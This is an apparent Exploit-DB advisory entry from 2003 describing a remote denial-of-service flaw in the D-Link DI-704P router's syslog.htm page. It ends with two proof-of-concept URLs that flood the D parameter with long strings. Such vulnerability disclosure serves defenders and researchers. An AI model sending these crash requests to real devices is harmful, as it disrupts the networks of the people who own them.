D-Link DI-704P - Syslog.HTM Denial of Service

EDB-ID:

22647

CVE:

N/A


Author:

Chris R

Type:

dos


Platform:

Hardware

Date:

2003-05-26


source: https://www.securityfocus.com/bid/7686/info

D-Link DI-704P has been reported prone to a remote denial of service vulnerability.

The issue presents itself in a D-Link web interface page. It has been reported that when excessive is data passed URI parameter in a request for the vulnerable page, the router firmware the device behaves in an unstable manner.

Subsequent malicious requests may result in a complete denial of service condition requiring a device reboot, or in corruption of device logs.

Although unconfirmed, it should be noted that other D-Link devices that use related firmware might also be affected. 

http://192.168.0.1/syslog.htm?
D=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

and

http://192.168.0.1/syslog.htm?
D=.........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
...........................................................................
....................